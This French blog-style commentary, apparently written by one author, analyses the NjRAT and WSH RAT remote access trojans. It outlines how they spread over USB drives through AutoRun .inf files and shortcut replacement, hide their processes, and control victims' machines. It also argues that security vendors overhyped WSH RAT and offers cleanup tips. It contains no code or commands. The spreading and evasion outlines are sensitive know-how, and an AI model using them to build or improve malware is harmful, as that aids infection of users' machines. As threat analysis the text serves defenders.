C'est un simple détournement d'appel d'API qui ne fonctionne fans le cas de NjRAT Danger Éditions que sur les systèmes 32 bits (presque plus commercialisé aujourd'hui).

Le programme fait juste en sorte de ne pas apparaitre dans les outils comme le gestionnaire des tâches en demandant à l'API d'ignorer son processus. Là aussi, des programmes spéciaux sont disponibles pour afficher les processus cachés.

Ils comptent principalement sur l'exploitation de la fonction AutoRun de Microsoft Windows pour exécuter tous les fichiers .inf présents dans un périphérique quand une connexion sur un port USB est établie. 

Dans majorité des cas, la fonction AutoRun est désactivée par défaut sur Windows, rendant inefficace les fichiers .inf.

Le fichier .inf créé par le programme malveillant pointe sur le chemin d'accès du programme malveillant, avec des instructions pour que quand la fonction AutoRun est enclenchée, elle exécute tous les fichiers .inf présents dans un disque USB connecté, ce qui permet la propagation.

La seconde méthode, est beaucoup plus brute. Le programme cache ou supprime tous les fichiers et répertoires présents dans un disque amovible, les remplace par des raccourcis pointant tous sur une copie du programme malveillant sur le disque. 

Quand la personne va sur un autre ordinateur pour transférer des fichiers et les exécute, l'infection est enclenchée.

On parle dans les deux cas d'avantage de petit bidouillage que de grande technique comme la propagation en réseau en utilisant des vulnérabilités par exemple. C'est plus du niveau des petits pirates ça.

Pour que le pirate informatique puisse contrôler votre ordinateur à distance, il a sur son ordinateur ce qu'on appelle un serveur, et tous les clients (chaque programme malveillant envoyé et activé par des victimes (vous, moi, le voisin, etc).

Les clients se connectent au serveur pour donner des indications. Adresse IP, géolocalisation, type de système, niveau de connexion, etc.

"%KEYLOGGER%" pour enregistrer les frappes, "%STEALER%" pour voler les mots de passe, etc.
Dans les grandes lignes, le programme peut sur ordre de son pirate :

- contrôler la souris de l'ordinateur et avoir un aperçu visuel de l'écran piraté.

- Contrôler la caméra.

- Écouter et enregistrez-l'est sortant du Micropone.

- Créer, supprimer, déplacer des fichiers et des répertoires.

- Créer, supprimer, modifier des clés et des valeurs de registre.

- Voler les mots de passe enregistrer dans les navigateurs et certains logiciels.

- Enregistrer les frappes du clavier et les éléments copier dans le presse-papiers.

- Ouvrir une discussion avec vous pour vous dire des mots doux.

La phrase "control is an illusion" ou "le control est une illusion" en Français viens en parti de ce type de programme malveillant. L'utilisateur pense que tout va bien, qu'il contrôle son système, mais au final il est piraté. Sauf s'il applique un certain nombre de règles utiles et qu'ils ont de bons programmes de sécurité.

Petite subtilité ; Dans le cas de NjRAT on parle de Serveur-Client.

Dans le cas d'un client-serveur, le Client est l'outil de contrôle présent sur l'ordinateur du pirate, et le serveur le programme malveillant sur l'ordinateur infecté. 

Les Serveur-Client ne sont pas utilisés fréquemment dans la cyber criminalité, en cause la difficulté de gérer plus d'une connexion.

À moins qu'un type réellement callé reprenne le projet en main, ce ne sont pas ces gamins qui vont représenter une réelle menace pour des systèmes bien sécurisés.

Et ce ne sont pas toutes leurs tentatives de chiffrement du code de leur programme, ou d'atteinte a l'intégrité de suite de sécurité ou l'évitement pur et simple de ces dernières que ces merdeux vont faire quoi que ce soit.

Vincent Léon Flores.

2019 a été rhytmé par les petits soucis de sécurité avec le protocole RDP (Remonte Desktop Protocol), la logistique merdique de Comodo Security, et l'apparition de nouvelle menace.

Parmi celle-ci, WSH RAT proposé par wshsoftware, sous licence payante, mais à l'exemple de 888 RAT, a été cracker par des concurrents puis télécharger par un connard d'analyste qui l'a dépecé, analysé, et vous sert aujourd'hui ces résultats pour le moins rassurant.

Alors, pourquoi un tel titre?

Parce-que les sociétés de cybersécurité en on fait vraiment tout un plat en 2019, a coup d'article et de propagande pour nous sortir leur traditionnel : une nouvelle menace super mega trop dangereuse de la mort qui tue est apparu, il est novateur et utilise blablabla et blablabla pour en fin de compte blablabla. Mais nous avons la solution, donc achetez notre antivirus!.....

On va expliquer ici pourquoi ce programme n'est pas particulièrement dangereux, et du même temps, pourquoi il aurait fallu faire gage de réserve quant aux aux expressions utilisées.

Premièrement, il faut savoir que WSH RAT, littéralement "Windows Script Host Temote Administration Tool", utilise deux langages script à savoir, Javascript (jsscript/. js) et VisualBasicScript (vbscript/.vbs).

Une fois le script généré par le constructeur de WSH RAT, on lance le script. Alors, dans le cas de ma machine, je ne vais pas vous refaire le sketch que jais déjà fait sur l'article de 888 RAT, mais ma configuration est sérieuse et jais dus la réduire pour que le programme puisse être exécuté.

Par la suite, le script va générer un exécutable dans le répertoire sélectionner par l'attaquant. Une élévation des privilèges est possible par le programme si l'attaquant l'a sélectionné, mais tout ça pour pas grand-chose excepté avoir plus de contrôles sur la machine a l'éxécution, le programme n'étant pas capable après un redémarrage de la machine d'obtenir a nouveau ces privilèges.

Des options traditionnelles de contrôle et de surveillance sont bien entendu présente, mais elles sont parfaitement détectables par un antivirus ou un analyseur correct.

Coté propagation, WSH RAT suit une mode très mauvaise.

Une méthode consiste en fait a lister tout les fichier et les répertoires d'un disque amovible, et les caché dans le meilleur des cas (le pire, mais plus rare, étant la suppression), pour les remplacer par des raccourcis de même nom, avec les mêmes logos, pointant tous sur une copie du script malveillant, elle aussi caché sur le disque amovible.

Une astuce consiste a aller dans "ordinateur", sélectionner le disque amovible et faire un clique gauche sur "propriété". Que les fichiers soit caché ou non, Windows affichera si oui ou non ils sont présent ce qui vous permettra de déterminé si vos fichiers on été supprimé, ou juste caché.

Dans le cas ou les objets dans le disque on été supprimer, formatez le disque.

Dans le cas ou les objets on été juste caché, dé-caché les, supprimez tout les raccourcis malicieux et les fichiers inconnus pour garder un disque sein.

Pour être bon aujourd'hui dans le domaine du développement de chevaux de Troie, il faut faire comme "N A P O L O N", le programmeur de Revenge RAT, qui a réussi en moins de 3 versions a proposé un cheval de Troie presque in-détectable, qui a demandé énormément de mise à jour chez les antivirus et là, oui, le bruit que ça a fait était davantage légitime, parce-que c'était un cheval de Troie développé en langage .Net mais qui ne copiaient pas les principes de ces homologues NjRAT (VB.Net), NanoCore (C#.Net), ou même encore d'autres programme connu comme DarkComet (Delphi), Zeus (C/C++), qui sont tous les géniteurs de grande et longue famille!

Voilà tout. WSH RAT a été surévalué par les experts en cybersécurité, qui ont vu en lui non pas une menace, mais un prétexte pour inciter les gens a acheté leur produit. Fin de l'histoire. Mais je me doute que nous n'aborderons pas ça qu'une fois.

Vincent Léon Flores.